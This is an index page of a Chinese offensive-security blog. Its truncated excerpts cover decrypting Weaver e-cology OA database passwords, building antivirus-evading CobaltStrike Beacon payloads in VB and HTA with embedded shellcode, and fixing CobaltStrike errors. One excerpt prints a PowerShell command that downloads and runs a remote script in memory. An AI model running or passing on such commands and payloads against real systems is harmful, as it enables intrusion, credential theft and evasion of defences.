泛微OA(ecology)数据库连接字串解密方法

RedFree | JAVA, Oracle | 2018-08-08
泛微OA(ecology)数据库连接字串解密方法
泛微OA数据库配置文件地址:/WEB-INF/service/datasource.xml可以看到数据库连接字串中的用户名和密码都进行了加密。找到公开的二次开发的jar包(下载链接: https://pan.baidu.com/s/1Iihq61-UM2m4TKTNIUZm3A 密码: fbr2),反编译查看源代码:可以看到解密的代码:使用同样的key,写一个解密Demo:package ecology; import javax.crypt... [阅读全文]
ė2,036 次访问 6没有评论 0

CobaltStrike teamserver [The Parallel GC can not be combined with -XX:ParallelGCThreads=0]错误修复

RedFree | CobaltStrike, JAVA, Metasploit | 2017-05-16
CobaltStrike teamserver [The Parallel GC can not be combined with -XX:ParallelGCThreads=0]错误修复
问题:升级到1.8.0_131导致的Bug.问题反馈地址:https://twitter.com/armitagehacker/status/856993860366602241 官方博客提供的解决方案:https://blog.cobaltstrike.com/2017/04/26/java-startup-bug-in-java-1-8u131/ 在teamserver脚本中java执行命令后加上:-XX:ParallelGCThreads=8原文:If you recently updated your penetration testing enviro... [阅读全文]
ė7,702 次访问 6没有评论 0, ,

使用VB生成CobaltStrike Beacon类型的免杀Payload

RedFree | CobaltStrike, JAVA, Metasploit, VB | 2016-10-19
使用VB生成CobaltStrike Beacon类型的免杀Payload
CobaltStrike已提供了生成Microsoft office宏的功能,直接使用此功能生成对应载荷的宏代码,新建vb工程粘贴宏代码并去掉不相关注释即可。vb6.0代码如下:Private Type PROCESS_INFORMATION     hProcess As Long     hThread As Long     dwProcessId&n... [阅读全文]
ė136 次访问 6没有评论 0, , ,

CobaltStrike 3.x生成HTML应用程序(.hta)的三种类型

RedFree | CobaltStrike, JAVA, Metasploit, VB, Windows | 2016-10-19
CobaltStrike 3.x生成HTML应用程序(.hta)的三种类型
1、Executableevil.hta代码:<script language="VBScript">     Function var_func()         var_shellcode = "4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000000000000000000000000000000000... [阅读全文]

CobaltStrike 3.x远程调用脚本获取会话的4种模式

RedFree | CobaltStrike, JAVA, Metasploit, Python, Windows | 2016-10-19
CobaltStrike 3.x远程调用脚本获取会话的4种模式
在CobaltStrike 3.x中有4种远程调用脚本执行载荷的方法:1、Powershell远程调用命令:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.118/rev'))"远程脚本内容:$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("... [阅读全文]

CobaltStrike 2.5无法交互执行cmd命令修复

RedFree | CobaltStrike, JAVA, Metasploit | 2016-10-18
CobaltStrike 2.5无法交互执行cmd命令修复
Metasploit 4.11.4版本之后msgpack进行了一次升级,导致CobaltStrike2.4和之前的版本都不能正常使用了。CobaltStrike 2.5对msgpack也进行了升级,但从此之后不能正常交互执行cmd命令了。报错信息如下: [-] Meterpreter 1 error while executing 'read 1': java.nio.charset.MalformedInputExcep... [阅读全文]
ė114 次访问 6没有评论 0, ,

ASP/PHP/JSP获取参数的顺序及参数叠加效果

RedFree | JAVA, PHP, Windows, 经验积累, 默认分类 | 2016-09-18
ASP/PHP/JSP获取参数的顺序及参数叠加效果
一、ASP代码<%response.write(request("id"))%>测试效果分析    ASP的GET参数比POST参数的优先级高,参数叠加提交最终会以逗号分割拼接。二、PHP代码<?php echo($_REQUEST['id']);?>测试效果分析PHP(php7)的POST参数优先级比GET高,参数叠加提交最终会使用最后一个参数值。三、JSP代码<%out.prin... [阅读全文]
ė120 次访问 6没有评论 0, ,
Ɣ回顶部